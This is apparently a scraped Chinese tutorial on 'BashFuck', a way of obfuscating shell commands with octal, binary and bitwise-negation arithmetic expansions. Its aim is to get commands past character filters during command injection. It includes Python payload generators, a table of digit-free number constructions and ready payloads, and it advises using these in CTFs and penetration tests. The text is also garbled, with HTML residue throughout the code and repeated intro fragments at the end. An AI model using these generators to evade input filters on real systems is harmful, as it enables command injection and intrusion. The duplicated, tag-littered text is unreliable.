BashFuck 技术详解<\/h1>

0x00 前言<\/h2>
BashFuck 是一种利用 Bash 脚本特性进行命令混淆和绕过限制的技术，类似于著名的 Brainfuck 编程语言概念。这种技术在渗透测试和 CTF 比赛中特别有用，可以绕过某些字符过滤限制。<\/p>

0x01 基础知识<\/h2>

系统兼容性说明<\/h3>

Debian\/Ubuntu 系统的 sh<\/code> 软链接指向 dash<\/code><\/li>
CentOS 系统的 sh<\/code> 软链接指向 bash<\/code><\/li>

Kali Linux 的 zsh<\/code> 不完全兼容 dash<\/code>，导致 IFS<\/code> 解析问题（可用空格代替）<\/li>
<\/ul>
关键概念<\/h3>

IFS (Internal Field Separator)<\/strong>: Bash 中的内部字段分隔符，默认为空格、制表符和换行符<\/li>
算术扩展 $(())<\/code><\/strong>: 用于执行算术运算并返回结果<\/li>
八进制\/十六进制表示法<\/strong>: Bash 中可以使用 \xxx<\/code> 形式表示字符<\/li>
<\/ol>
0x02 常见技术方法<\/h2>
方法一：Common Oct (常规八进制编码)<\/h3>
将命令转换为八进制表示形式：<\/p>
sum_data =<\/span> ''<\/span>
<\/span><\/span>str1 =<\/span> input("请输入要转化的命令:"<\/span>)
<\/span><\/span>str1 =<\/span> str1.<\/span>strip()  # 去除首尾空格<\/span>
<\/span><\/span>data_len =<\/span> len(str1)  # 判断总长度来循环<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(data_len):
<\/span><\/span>    data =<\/span> ord(str1[i])
<\/span><\/span>    if<\/span> data ==<\/span> ord(' '<\/span>):  # 检查空格字符<\/span>
<\/span><\/span>        sum_data +=<\/span> "'$IFS$'"<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        data_8 =<\/span> oct(data)[2<\/span>:]
<\/span><\/span>        final_data =<\/span> '<\/span>\\<\/span>'<\/span> +<\/span> data_8
<\/span><\/span>        sum_data +=<\/span> final_data
<\/span><\/span>print("common_oct"<\/span>)
<\/span><\/span>print("$'"<\/span> +<\/span> sum_data +<\/span> "'"<\/span>)
<\/span><\/span><\/code><\/pre>示例<\/strong>:<\/p>
$'\154\163'<\/span>  # 等同于 ls 命令<\/span>
<\/span><\/span><\/code><\/pre>方法二：BashFuck X (算术扩展构造)<\/h3>
利用算术扩展 $(())<\/code> 构造命令：<\/p>

基本形式：<\/li>
<\/ol>
"<\/span>$"<\/span>''<\/span>\'<\/span>'\'<\/span>$(($((<\/span>1<\/span>))<\/span>54<\/span>))<\/span>'\'<\/span>$(($((<\/span>1<\/span>))<\/span>63<\/span>))<\/span>\'<\/span>
<\/span><\/span><\/code><\/pre>
二进制构造形式：<\/li>
<\/ol>
$\'\\<\/span>$(($((<\/span>1<\/span><<1))#1<\/span>0011010<\/span>))<\/span>\\<\/span>$(($((<\/span>1<\/span><<1))#1<\/span>0100011<\/span>))<\/span>\'<\/span>
<\/span><\/span><\/code><\/pre>数字表示方法<\/strong>:<\/p>

${#}<\/code> → 0<\/li>
${##}<\/code> → 1<\/li>
${#_}<\/code> → 1<\/li>
${_}<\/code> → 1<\/li>
${?}<\/code> → 0<\/li>
${?#}<\/code> → 1<\/li>
<\/ul>
Python 转换脚本<\/strong>:<\/p>
def<\/span> bashfuckx<\/span>():
<\/span><\/span>    final_str1 =<\/span> ''<\/span>
<\/span><\/span>    final_str2 =<\/span> ''<\/span>
<\/span><\/span>    final_str3 =<\/span> ''<\/span>
<\/span><\/span>    str3 =<\/span> input("请输入要转化的命令:"<\/span>)
<\/span><\/span>    for<\/span> j in<\/span> str3:
<\/span><\/span>        final_str1 +=<\/span> '$0<<<$0<\/span>\\<\/span><<\/span>\\<\/span><<\/span>\\<\/span><<\/span>\\<\/span>$<\/span>\\\'<\/span>'<\/span> +<\/span>f<\/span>'<\/span>\\\\<\/span>$(($((1<<1))#<\/span>{<\/span>bin(int(get_oct(j)))[2<\/span>:]}<\/span>))'<\/span>+<\/span> '<\/span>\\\'<\/span>'<\/span>
<\/span><\/span>        final_str2 =<\/span> '$0<<<$0<\/span>\\<\/span><<\/span>\\<\/span><<\/span>\\<\/span><<\/span>\\<\/span>$<\/span>\\\'<\/span>'<\/span> +<\/span>final_str1.<\/span>replace('1'<\/span>, '${##}'<\/span>)+<\/span> '<\/span>\\\'<\/span>'<\/span>  # 用 ${##} 来替换 1<\/span>
<\/span><\/span>        final_str3 =<\/span> '${!#}<<<${!#}<\/span>\\<\/span><<\/span>\\<\/span><<\/span>\\<\/span><<\/span>\\<\/span>$<\/span>\\\'<\/span>'<\/span> +<\/span>final_str1.<\/span>replace('1'<\/span>, '${##}'<\/span>).<\/span>replace('0'<\/span>, '${#}'<\/span>)+<\/span> '<\/span>\\\'<\/span>'<\/span>  # 用 ${#} 来替换 0<\/span>
<\/span><\/span>    result =<\/span> input("请输入你要的格式<\/span>\n<\/span>1代表直接转化<\/span>\n<\/span>2代表替换1<\/span>\n<\/span>3代表全部替换（无数字）"<\/span>)
<\/span><\/span>    if<\/span> result ==<\/span> '1'<\/span>:
<\/span><\/span>        print(final_str1)
<\/span><\/span>    elif<\/span> result ==<\/span> '2'<\/span>:
<\/span><\/span>        print(final_str2)
<\/span><\/span>    elif<\/span> result ==<\/span> '3'<\/span>:
<\/span><\/span>        print(final_str3)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print("无效输入！"<\/span>)
<\/span><\/span><\/code><\/pre>注意<\/strong>: 由于扩展顺序问题，需要使用标准输入完成解析：<\/p>
\/bin\/bash<<<<\/span>
<\/span><\/span><\/code><\/pre>方法三：BashFuck Y (取反构造)<\/h3>
利用 -1<\/code> 的取反特性构造数字：<\/p>
数字构造表<\/strong>:<\/p>
oct_list =<\/span> [  # 构造数字 0-7 以便于后续八进制形式的构造<\/span>
<\/span><\/span>    '$(())'<\/span>,  # 0<\/span>
<\/span><\/span>    '$((~$(($((~$(())))$((~$(())))))))'<\/span>,  # 1<\/span>
<\/span><\/span>    '$((~$(($((~$(())))$((~$(())))$((~$(())))))))'<\/span>,  # 2<\/span>
<\/span><\/span>    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))'<\/span>,  # 3<\/span>
<\/span><\/span>    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))'<\/span>,  # 4<\/span>
<\/span><\/span>    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))'<\/span>,  # 5<\/span>
<\/span><\/span>    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))'<\/span>,  # 6<\/span>
<\/span><\/span>    '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))'<\/span>,  # 7<\/span>
<\/span><\/span>]
<\/span><\/span><\/code><\/pre>示例 Payload<\/strong> (执行 ls<\/code> 命令):<\/p>
__=<\/span>$(())<\/span>&&<\/span>${<\/span>!__}<\/span><<<<\/span>${<\/span>!__}<\/span>\<\<\<\$\'\\<\/span>$((<\/span>~$(($((<\/span>~$(())))$((<\/span>~$(())))))))$((<\/span>~$(($((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))))))$((<\/span>~$(($((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))))))<\/span>\\<\/span>$((<\/span>~$(($((<\/span>~$(())))$((<\/span>~$(())))))))$((<\/span>~$(($((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))))))$((<\/span>~$(($((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))$((<\/span>~$(())))))))<\/span>\'<\/span>
<\/span><\/span><\/code><\/pre>0x03 技术要点总结<\/h2>


字符集限制绕过<\/strong>:<\/p>

使用八进制\/二进制表示法绕过特定字符限制<\/li>
利用 Bash 变量扩展构造所需字符<\/li>
<\/ul>
<\/li>

执行方式<\/strong>:<\/p>

通过标准输入重定向解决扩展顺序问题<\/li>
使用 $0<\/code> 表示当前 shell (通常是 bash)<\/li>
<\/ul>
<\/li>

无数字构造<\/strong>:<\/p>

使用 ${#}<\/code> 表示 0<\/li>
使用 ${##}<\/code> 表示 1<\/li>
通过这些基础构造所有需要的数字<\/li>
<\/ul>
<\/li>

空格处理<\/strong>:<\/p>

使用 $IFS$<\/code> 或直接空格<\/li>
在 Kali zsh 中可能需要直接使用空格<\/li>
<\/ul>
<\/li>
<\/ol>
0x04 参考资源<\/h2>

BashFuck GitHub 仓库<\/a><\/li>
GNU Bash 手册 - Shell 扩展<\/a><\/li>
<\/ol>
0x05 实际应用建议<\/h2>

在 CTF 比赛中遇到字符限制时，可以考虑使用 BashFuck 技术<\/li>
渗透测试中遇到命令注入但存在字符过滤时，可以尝试此类方法<\/li>
建议先本地测试构造的命令，确保在不同系统上的兼容性<\/li>
对于复杂命令，可以分段构造测试<\/li>
<\/ol>

BashFuck 技术详解<\/h1>

0x00 前言<\/h2> BashFuck 是一种利用 Bash 脚本特性进行命令混淆和绕过限制的技术，类似于著名的 Brainfuck 编程语言概念。这种技术在渗透测试和 CTF 比赛中特别有用，可以绕过某些字符过滤限制。<\/p>

0x01 基础知识<\/h2>

0x02 常见技术方法<\/h2>

0x00 前言<\/h2>
BashFuck 是一种利用 Bash 脚本特性进行命令混淆和绕过限制的技术，类似于著名的 Brainfuck 编程语言概念。这种技术在渗透测试和 CTF 比赛中特别有用，可以绕过某些字符过滤限制。<\/p>